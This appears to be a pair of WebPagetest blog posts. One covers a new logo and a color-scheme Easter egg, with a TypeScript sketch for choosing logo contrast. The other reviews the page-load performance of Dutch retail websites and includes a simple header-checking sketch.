I'm not a graphic designer by any stretch of the imagination and the UI designer provided the basis for the new logo but I wanted something that had a transparent background and that I could modify myself so I went and created a new one. I HIGHLY recommend Inkscape for those that haven't tried it. It is a free (open source) vector drawing program that is used even by a lot of professional designers. I managed to whip together the logo in a few minutes and create it in various different sizes (as well as a favicon) all from the same source (ahh, the beauty of vector graphics).
Finally, as a bonus for making it this far, there is an Easter egg in the new UI that lets you change the color scheme if you don't like the blue background. Just pass a hex color code in as a query parameter and you can use whatever color you want (with the logo auto-switching from white to black as needed). Here are some to get you started:
The original color scheme provided by the designer:
http://www.webpagetest.org/?color=f1c52e
Green:
http://www.webpagetest.org/?color=005030
Black:
http://www.webpagetest.org/?color=000000
White:
http://www.webpagetest.org/?color=ffffff
Orange:
http://www.webpagetest.org/?color=f47321
The color will stick until you clear your cookies or manually reset it. To reset it to the default just pass an invalid color:
http://www.webpagetest.org/?color=0
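For the curious, the logic behind an Easter egg like this can be sketched in a few lines. This is NOT the code running on the site, just one plausible way to do it: the six-digit-only validation, the brightness formula (ITU-R BT.601 luma weights) and the threshold of 128 are all assumptions, as are the function names.

```typescript
// Parse a six-digit hex color such as "f1c52e"; anything else is treated as invalid.
function parseHexColor(value: string): [number, number, number] | null {
  if (!/^[0-9a-fA-F]{6}$/.test(value)) {
    return null;
  }
  return [
    parseInt(value.slice(0, 2), 16),
    parseInt(value.slice(2, 4), 16),
    parseInt(value.slice(4, 6), 16),
  ];
}

// Pick a logo color that contrasts with the background using perceived brightness.
// Returns null for an invalid color so the caller can fall back to the default scheme.
function logoColorFor(value: string): "white" | "black" | null {
  const rgb = parseHexColor(value);
  if (rgb === null) {
    return null;
  }
  const [r, g, b] = rgb;
  const brightness = 0.299 * r + 0.587 * g + 0.114 * b; // 0 (dark) to 255 (light)
  return brightness < 128 ? "white" : "black"; // assumed threshold
}

const logoOnBlack = logoColorFor("000000");
const logoOnWhite = logoColorFor("ffffff");
const logoOnGreen = logoColorFor("005030");
const logoOnInvalid = logoColorFor("0");
console.log(logoOnBlack, logoOnWhite, logoOnGreen, logoOnInvalid);
```

Dark backgrounds get a white logo, light backgrounds get a black one, and an invalid value like `0` returns `null`, which is the cue to reset to the default.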
As always, feel free to send me any feedback, suggestions or questions.
Europe is definitely a hotspot for interest in web performance (WebPagetest sees almost as much traffic from there as the US). A huge "thank you" goes out to Aaron Peters who volunteered to expand our European testing footprint with a location in Amsterdam.
For an inaugural run, he ran some tests of the top online merchants in The Netherlands (according to Twinkle magazine) and from the looks of it there's quite a market need for Web Performance Optimization experts in the area.
(click on any of the urls to go to the test results for that page)
thomascook.nl - wow! poster-child material. Failures across the board with no persistent connections, caching, compression, nothing. It's actually amazing that it managed to load in 12 seconds at all.
www.wehkamp.nl - Not too bad on the standard things but a crazy number of javascript and css files in the head (and no caching) so a pretty poor user experience. A couple of tweaks could cut the load time in half and significantly speed up the start render time.
www.arke.nl - Apparently caching is passé - yet another site that doesn't like to use expires headers but what really surprised me was the 222KB of css that is being delivered without any compression. Both the sheer amount of CSS and the fact that it isn't compressed are pretty scary.
www.bol.com - Pretty much just got the keep-alives right. No compression, no caching, and a bunch of js/css files that need to be merged.
www.transavia.com - Yay, someone is actually compressing their javascript! Just a shame they have so much of it (150KB compressed) and in so many different files and wow, a 209KB png that should easily be an 8-bit (and MUCH smaller) image.
www.oad.nl - And now we're back to the really low bar of failures across the board (including persistent connections) and a couple of 404's for good measure.
www.dell.nl - Dell did a reasonable job (though to be fair, it's probably a global template) and it's not a very rich landing page but they could still get quite a bit of improvement with image sprites and delaying the javascript.
www.cheaptickets.nl - Do I sound like a broken record yet? Other than persistent connections - epic fail!
www.d-reizen.nl - In DESPERATE need of some SpriteMe love (in addition to the usual suspects).
The sad part is that with just a couple of minutes of work every one of these sites could load in half the time and present a MUCH better user experience. We've already seen time and time again that conversions, sales, etc all increase substantially with improved page performance and as I see over and over again, the vast majority of sites aren't even taking the five minutes to handle the absolute basics (most of which can be done just with configuration changes).
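Most of those basics (persistent connections, caching, compression) show up directly in the response headers, so a quick check is easy to sketch. The version below is a deliberate simplification and not how WebPagetest grades anything: the `checkBasics` helper and `HeaderMap` type are made up for this example, header names are assumed to be lower-cased already, any Expires header counts as a caching policy, and keep-alive is judged HTTP/1.1 style (persistent unless the server says `Connection: close`).

```typescript
// Response headers with lower-cased names, e.g. { "content-encoding": "gzip" }.
type HeaderMap = { [name: string]: string };

interface BasicChecks {
  compressed: boolean;
  cacheable: boolean;
  keepAlive: boolean;
}

function checkBasics(headers: HeaderMap): BasicChecks {
  const encoding = (headers["content-encoding"] || "").toLowerCase();
  const cacheControl = (headers["cache-control"] || "").toLowerCase();
  const connection = (headers["connection"] || "").toLowerCase();
  return {
    // gzip or deflate applied to the response body
    compressed: encoding.indexOf("gzip") !== -1 || encoding.indexOf("deflate") !== -1,
    // an Expires header or a non-zero max-age counts as a caching policy here
    cacheable: "expires" in headers || /max-age=[1-9]/.test(cacheControl),
    // HTTP/1.1 connections persist unless the server asks to close them
    keepAlive: connection.indexOf("close") === -1,
  };
}

// Two made-up responses: one that gets the basics right and one that doesn't.
const goodResponse = checkBasics({
  "content-encoding": "gzip",
  "cache-control": "max-age=31536000",
  "connection": "keep-alive",
});
const badResponse = checkBasics({
  "cache-control": "no-cache",
  "connection": "close",
});
console.log(goodResponse, badResponse);
```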